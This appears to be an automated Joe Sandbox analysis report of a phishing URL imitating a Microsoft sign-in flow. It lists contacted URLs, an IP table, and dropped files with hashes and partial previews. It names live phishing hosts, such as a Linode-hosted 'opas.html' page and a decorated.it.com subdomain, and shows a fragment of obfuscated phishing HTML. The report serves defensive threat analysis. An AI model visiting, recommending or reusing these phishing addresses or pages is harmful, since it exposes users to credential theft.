                                                                                                                                                unknown
                                                                                                                                                https://otelrules.svc.static.microsoft/rules/rule701150v1s19.xmlfalse
                                                                                                                                                  high
                                                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule701250v1s19.xmlfalse
                                                                                                                                                    high
                                                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule702150v1s19.xmlfalse
                                                                                                                                                      high
                                                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule120680v0s19.xmlfalse
                                                                                                                                                        high
                                                                                                                                                        https://www.google.com/recaptcha/api2/reload?k=6LcGrSQrAAAAAGRdF_5OKhQTy7DfZ0sTdR27o33yfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule120668v0s19.xmlfalse
                                                                                                                                                          high
                                                                                                                                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/1r9bu/0x4AAAAAABT-Uw9lt5N3V6JZ/auto/fbE/new/normal/auto/false
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule120620v0s19.xmlfalse
                                                                                                                                                            high
                                                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule703351v0s19.xmlfalse
                                                                                                                                                              high
                                                                                                                                                              https://microcmg.jp-osa-1.linodeobjects.com/favicon.icotrue
                                                                                                                                                              • Avira URL Cloud: phishing
                                                                                                                                                              unknown
                                                                                                                                                              https://otelrules.svc.static.microsoft/rules/rule120638v0s19.xmlfalse
                                                                                                                                                                high
                                                                                                                                                                https://otelrules.svc.static.microsoft/rules/rule120644v0s19.xmlfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule703901v0s19.xmlfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://colegiojuancalvino.com/favicon.icofalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule120672v0s19.xmlfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1false
                                                                                                                                                                        high
                                                                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule224901v11s19.xmlfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule120666v0s19.xmlfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule120650v0s19.xmlfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://otelrules.svc.static.microsoft/rules/rule120608v0s19.xmlfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://otelrules.svc.static.microsoft/rules/rule702951v1s19.xmlfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule120649v0s19.xmlfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule120661v0s19.xmlfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule120655v0s19.xmlfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule702300v1s19.xmlfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule120614v0s19.xmlfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638812907206847860.MWIxMDY0ZTItYmM5Ni00M2IzLThiNDMtZGE1OWRhNzk0ZmMxYWI4ZWZjYzQtNTZmMi00MzgwLWExMDEtYTc0ZTI5ODdhY2Nk&ui_locales=en-US&mkt=en-US&client-request-id=ba651f70-bce4-4aca-8b42-40c53145ac1e&state=1H_7hRKg8dtxfQnszta-VybGdR61VaWOFYoMKJG2ttadv_xV4YsYERfKSJLV16kjzIBwbpfsg7lcX5yZntM87e-GQCDgtv-B87UINv_RxudT6r6uYPW99AgPHPKuBouE3K8lKqfSo5PbIOnwC8SZnyuA_TrMoONv3NyylCGl0b-JR814jaXSRqJba0a61YK6jKzreiFpdVhJC-SMB5eq68SCdpkq7425psvnOZ42j-qm8wU7Fsv9UFg6eQ6ckrNNr_u1rpdvDJZlODxnChErDQ&x-client-SKU=ID_NET8_0&x-client-ver=8.5.0.0false
                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule700050v1s19.xmlfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://otelrules.svc.static.microsoft/rules/other-Win32-v19.bundlefalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://otelrules.svc.static.microsoft/rules/rule702350v1s19.xmlfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule120639v0s19.xmlfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://gmddqjzslbcuxxqboemm.decorated.it.com/false
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule701050v1s19.xmlfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule701350v1s19.xmlfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule702200v1s19.xmlfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule701200v1s19.xmlfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule700350v1s19.xmlfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://otelrules.svc.static.microsoft/rules/rule120648v0s19.xmlfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svgfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule120657v0s19.xmlfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule702500v1s19.xmlfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule120660v0s19.xmlfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://5963053387-1317754460.cos.ap-jakarta.myqcloud.com/attach%2Fbootstrap.min.jsfalse
                                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule701500v1s19.xmlfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule703500v0s19.xmlfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule120624v0s19.xmlfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              https://otelrules.svc.static.microsoft/rules/rule700200v1s19.xmlfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                https://otelrules.svc.static.microsoft/rules/rule700500v1s19.xmlfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                  • 75% < No. of IPs
                                                                                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                  13.107.6.156
                                                                                                                                                                                                                                  b-0004.b-msedge.netUnited States
                                                                                                                                                                                                                                  8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                  198.23.60.214
                                                                                                                                                                                                                                  colegiojuancalvino.comUnited States
                                                                                                                                                                                                                                  32748STEADFASTUSfalse
                                                                                                                                                                                                                                  172.217.14.74
                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                  13.107.246.69
                                                                                                                                                                                                                                  s-part-0041.t-0009.t-msedge.netUnited States
                                                                                                                                                                                                                                  8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                  104.18.94.41
                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                  20.190.151.6
                                                                                                                                                                                                                                  www.tm.a.prd.aadg.akadns.netUnited States
                                                                                                                                                                                                                                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                  104.21.64.1
                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                  104.21.80.1
                                                                                                                                                                                                                                  gmddqjzslbcuxxqboemm.decorated.it.comUnited States
                                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                  151.101.130.137
                                                                                                                                                                                                                                  code.jquery.comUnited States
                                                                                                                                                                                                                                  54113FASTLYUSfalse
                                                                                                                                                                                                                                  142.250.176.14
                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                  104.21.112.1
                                                                                                                                                                                                                                  miog.decorated.it.comUnited States
                                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                  142.250.217.142
                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                  23.15.240.19
                                                                                                                                                                                                                                  e329293.dscd.akamaiedge.netUnited States
                                                                                                                                                                                                                                  20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                  142.251.40.42
                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                  142.250.72.164
                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                  142.250.72.142
                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                  142.250.72.163
                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                  142.250.188.228
                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                  142.250.69.4
                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                  104.17.24.14
                                                                                                                                                                                                                                  cdnjs.cloudflare.comUnited States
                                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                  74.125.137.84
                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                  192.178.49.195
                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                  172.234.86.83
                                                                                                                                                                                                                                  jp-osa-1.linodeobjects.com.akadns.netUnited States
                                                                                                                                                                                                                                  20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                  43.129.45.113
                                                                                                                                                                                                                                  cos.ap-jakarta.myqcloud.comJapan4249LILLY-ASUSfalse
                                                                                                                                                                                                                                  23.1.237.105
                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                  20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                  104.18.95.41
                                                                                                                                                                                                                                  challenges.cloudflare.comUnited States
                                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                  142.250.68.10
                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                  13.107.246.71
                                                                                                                                                                                                                                  s-part-0043.t-0009.t-msedge.netUnited States
                                                                                                                                                                                                                                  8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                  142.250.189.3
                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                  142.250.68.227
                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                  104.18.11.207
                                                                                                                                                                                                                                  stackpath.bootstrapcdn.comUnited States
                                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                  142.251.40.35
                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                  142.250.189.10
                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                  142.250.72.131
                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                  142.250.72.132
                                                                                                                                                                                                                                  www.google.comUnited States
                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                  IP
                                                                                                                                                                                                                                  192.168.2.17
                                                                                                                                                                                                                                  192.168.2.15
                                                                                                                                                                                                                                  192.168.2.14
                                                                                                                                                                                                                                  Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                                                                                  Analysis ID:1675103
                                                                                                                                                                                                                                  Start date and time:2025-04-26 20:57:32 +02:00
                                                                                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                  Overall analysis duration:
                                                                                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                  Report type:full
                                                                                                                                                                                                                                  Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                                                                                                                                  Sample URL:https://colegiojuancalvino.com/cloud/
                                                                                                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                  Number of analysed new started processes analysed:14
                                                                                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                                                                                  Technologies:
                                                                                                                                                                                                                                  • EGA enabled
                                                                                                                                                                                                                                  Analysis Mode:stream
                                                                                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                                                                                  Detection:MAL
                                                                                                                                                                                                                                  Classification:mal72.phis.win@26/41@93/342
                                                                                                                                                                                                                                  • Exclude process from analysis (whitelisted): svchost.exe
                                                                                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 142.250.176.14, 142.250.68.227, 74.125.137.84, 142.250.72.142, 142.250.188.238, 142.250.72.174, 142.251.40.42, 192.178.49.206, 192.178.49.195, 142.250.72.163
                                                                                                                                                                                                                                  • Excluded domains from analysis (whitelisted): fonts.googleapis.com, clients2.google.com, accounts.google.com, redirector.gvt1.com, fonts.gstatic.com, clientservices.googleapis.com, clients.l.google.com, www.gstatic.com
                                                                                                                                                                                                                                  • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                  • VT rate limit hit for: https://colegiojuancalvino.com/cloud/
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3461)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):26193
                                                                                                                                                                                                                                  Entropy (8bit):4.327014138249268
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                                  MD5:45037B5FD979E1A15CE4F43FE2818D5A
                                                                                                                                                                                                                                  SHA1:155314716CA8BA4912B577D3D34DBD64CECE603F
                                                                                                                                                                                                                                  SHA-256:7F13258D9699C9711C60D34FAA65272BB27881216CA4A830101BE468C8158F04
                                                                                                                                                                                                                                  SHA-512:4065F6FFE9102636C5BC05A1AAA786AFE6FA1A7FEF3429A9D9087AAA0419F71C844415E135D7F0A00A91BEFAFEBD51C6DAB1CFE0EF777A36009CFD37FB10BC6C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  URL:https://colegiojuancalvino.com/cloud/img/styles.css
                                                                                                                                                                                                                                  Preview:.container {. background: white;. padding: 40px;. border-radius: 20px;. box-shadow: 0 10px 30px rgba(0, 0, 0, 0.1);. text-align: center;. max-width: 400px;. width: 90%;. margin: 20px;. animation: slideIn 0.8s ease-in-out;. }.. @keyframes slideIn {. from { opacity: 0; transform: translateY(-50px); }. to { opacity: 1; transform: translateY(0); }. }.. .logo-container {. background: #EBF5FF;. width: 80px;. height: 80px;. border-radius: 50%;. display: flex;. align-items: center;. justify-content: center;. margin: 0 auto 20px;. }.. .logo {. width: 40px;. height: 40px;. color: #2575fc;. }.. h1 {. font-size: 28px;. margin-bottom: 10px;. color: #2575fc;. font
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 226 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3331
                                                                                                                                                                                                                                  Entropy (8bit):7.927896166439245
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                                  MD5:EF884BDEDEF280DF97A4C5604058D8DB
                                                                                                                                                                                                                                  SHA1:6F04244B51AD2409659E267D308B97E09CE9062B
                                                                                                                                                                                                                                  SHA-256:825DE044D5AC6442A094FF95099F9F67E9249A8110A2FBD57128285776632ADB
                                                                                                                                                                                                                                  SHA-512:A083381C53070B65B3B8A7A7293D5D2674D2F6EC69C0E19748823D3FDD6F527E8D3D31D311CCEF8E26FC531770F101CDAF95F23ECC990DB405B5EF48B0C91BA2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview:.PNG........IHDR.......0............sRGB.........IDATx..=w....G.z..L.4fN.k\dS..._`..........r...~.F..e._.RZ.0.K.\..CB...1.{qq/..^|.G..o.......?....Or.......y~....]..V.a.mM...M.\k*H..@B`s.$"n...)!.@"b#4. !.9...7.u...hD ....T.........:EJ.4"..X........<|.pgkk+....>~.....pju1i"b.J.&!.!...=T....k..D7.....O.<.?}......./..(.`0..!.C..'.?..e..~.....l6...._.x1rmR...$|E...l.WKDH...f..... ...Y.0R....>...{...-..o........,...E../......_....eM.Q....@Q...w sp5.9..l.W)...Pq... .]..B..).../M.G.g....].V...5$<......Eb.9.....>LYAk.Z.k..b..]N%>}4a....4!S...t..d..<.8AH+.../r...._...!qt.:q..fR.:..KW.._...T...5..>.0!.hq.rbND\...XR.,2.uX..Q.b...wQ......g..X...F...~.....ikZE...UA....V.I!..]..Mm..R.....~k.VC.n..V.*B#W...\..yI.3.....2........6c....2J....,g..5O1.s.4V2.....f..K..Obf\....;.w...|.F>F>6_z..P.dU<.wVV......?.q.?&........O.>....l.S.upp....59.C_.......fJ.M.={v,......]Y_....n.?UF....v<.$..AD...p.....:$r =p...C.k.3....n.v..~.TGd!...l.W...s..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 210 x 58, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):8538
                                                                                                                                                                                                                                  Entropy (8bit):7.922423472123686
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                                  MD5:E3ED7CB79ACE1254CF3397F09D60FE91
                                                                                                                                                                                                                                  SHA1:1E869C3313FA457B109083CC8C615A14A7B45771
                                                                                                                                                                                                                                  SHA-256:73357131CC760F89F69EF74AC34D783BC6BF0FF8AA253BFBE015EB149E299B4F
                                                                                                                                                                                                                                  SHA-512:ED22F309E33C868FC81A56A2E06CDD234135E936027B3D3C411D4E8EC1D373102DFEB3BF968DDB6B452B880C50109EFD3AD91049CC00323235FA22451B2BD120
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview:.PNG........IHDR.......:...........@iCCPICC Profile..H..W.XS...[..@h.......).....H.6B. ...A.^..\.*.`CWE.....;.b."..X...&.t.W.w.o...?g.s..e.P;....Qu.r.y.. ?zbR2....`..`$p.psE...0.m..w{..zC.n/..g..5..?.....q*/....!..J.H...Q.M..I1l@K...x....q.....>.Ol4.....T8.q:..W!O..C..>...<...5:..99Sy..@l.}D.K...?..M3uX..I....L._.+....?..-'[2...6..qp.t.nw...J........5!.(...!F)...8.?j..e......y..P.. ..f..)..4A .b.B..A.;.b]...s.b.>[.S.....41.../p...X.$YqL....>[....f.&@L..<_....*...Y1...q....!..$Z..9..|a..\..O..F+..sr..m......@^Fl..>X..#.......2.t...aCs.....s......GQ._.|,N.eG*.qS~v..7..97?F1....R....."c.y...Hy>.J..X.....T0.d.A[oC/........t....fhD..G..1............A>....=H....Fd.g..P...%.Q..h..)d........M....!.;.L....E...y.....`b ....qO<..}as.....<.......O.7....S...?e9.t@.@E-R...n.5]p?...Ce\.....3...}`d...yK.B.I.o3..n(..d.<..K..y........?.G.k.p.Y.=?.g.P}.<...-..b...E......I..k.K...z*[]C.e.dA..?...Yi%s.k.{........w4`M.....3..L.E...B..(...........6J..@tZ.s...........\.I...
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (1945)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):7568
                                                                                                                                                                                                                                  Entropy (8bit):5.722956622226166
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                                  MD5:2E9EA16B23AD5D8C37F0E94F1E567978
                                                                                                                                                                                                                                  SHA1:F194D3B982EE12463CEABE1CB74F85299748A2D8
                                                                                                                                                                                                                                  SHA-256:5F0F2439695F3C66FF5A22EE4292E4B2D5187C7D4EF31CBF45297B53CA4D0F91
                                                                                                                                                                                                                                  SHA-512:7E04F25A1B480C74434481329BCD9894B3AC58E8FB758FD5F32B973A6368407B05B2843CCD1AB7EA8F5C68772586255565F3B2A9A4624C9950689A1344D3F9BE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  URL:https://microcmg.jp-osa-1.linodeobjects.com/opas/opas.html?e=sample@domain.com
                                                                                                                                                                                                                                  Preview:<html>..<head>.. <meta ..name="viewport" .content="width=device-width, . initial-scale=1.0">... ..<a>Duis ball tip alcatra ut strip steak.</a>.. -->.. <script.src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.2.0/crypto-js.min.js"></script>.<style>... .body..,.html.{ height: 100%;margin:..0;display:.flex;align-items:. center;justify-content: center }..@keyframes .bounce { ..0%...,.. 100%..,. 12.5% ,...32.5% .,. 76.1%.{. .transform:.translateY(0) } 22.5%. , ..86% { transform: translateY(7px) . } . }.. #drat { .height: .179px;width:.130px;overflow:.. hidden;margin-top:.-59px;margin-left:..25px..}.@keyframes. .shadow-fade..{ 0%. .,..100% , 21.2%.,. 80% ..{ . opacity: . 0 .}. .47% ,. 70%. .{ opacity:. 1 .}...}... .#epicuticular ..{.width:.130px;margin-top: .179px }.#anthraquinone.{ width:..130px;height: 71px;border-radius: . 0 0. 7px.. 7px;overflow:.. hidden;margin-top: -41px.}.. #anthraquinone > . .monogenetic. .{. width: 287px;height:.71px;background:
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):6830
                                                                                                                                                                                                                                  Entropy (8bit):7.849424154989951
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                                  MD5:F1E3F187F7C23FA8D1555004F3800356
                                                                                                                                                                                                                                  SHA1:E71E52A142E754399AE39EF38584789B66E9EA00
                                                                                                                                                                                                                                  SHA-256:DB307FCEF7F95139689007D7A623B340EC21282BD421C4E4B2BA09078F230545
                                                                                                                                                                                                                                  SHA-512:BD568B1C92D7C3B586E2EA7E9C47B08FD1171FF6615FA4F670F12950DC62315B58E6BB5336F50B111FF42B27558398DFF9715054A8E44F0A8B9CD1541F0BC07D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  URL:https://colegiojuancalvino.com/cloud/img/pdf.png
                                                                                                                                                                                                                                  Preview:.PNG........IHDR.............\r.f... cHRM..z&..............u0...`..:....p..Q<....bKGD.............7IDATx..K....j.[....{..&....V6....np3...-.. $.qF..0.a....a6y...........&D.g.#.........;..aC..q.5.k....n..SU.T...Oj.[..w......:.....Nz....P.0..,..................b`..X........`10..,..................b`..X......U.@...?...Dfs..S....''.....y.I.'q.s...^.9........u.~qnn.......p.........?\u..Pz..&.>.E....)O....zzz.?..k.q#...;0..`Y...jaA.....S.\HF...#"...".dY:.O./..@.C)........f.I...<..;o.9..0... ..B.....I..&`.4...|..1..9z...o.E...P..h...R..P.q...l....1....8....$..v.....q.q.j6.4555Vw.g..=:TJ......v\.6.%.).H(...._'.._.>.f...s].&.......j.U]..?2..-..rs....U.....7T0._.p..<.......*.4.".|S...C....L@=...Q..(,.^.S...`?@...f...1x......w.6.~....F......7....{.\....z..B.....d..;........F.&.... 3\.T........q..Fcq...9|.&....A.....<........{..L 3,. ..1a...!(.`- .F.ASK&px..<p...D...d....*W~g].........h.j.0.Y.....d...4dK. .F...`.Y`j..\.7SQ{_.f.AS.............\....S..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):621
                                                                                                                                                                                                                                  Entropy (8bit):7.673946009263606
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                                  MD5:4761405717E938D7E7400BB15715DB1E
                                                                                                                                                                                                                                  SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                                                                                                                                                                                                  SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                                                                                                                                                                                                  SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  URL:https://aadcdn.msauth.net/shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg
                                                                                                                                                                                                                                  Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 48 x 48, 8-bit gray+alpha, non-interlaced
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):665
                                                                                                                                                                                                                                  Entropy (8bit):7.42832670119013
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                                  MD5:07BF314AAB04047B9E9A959EE6F63DA3
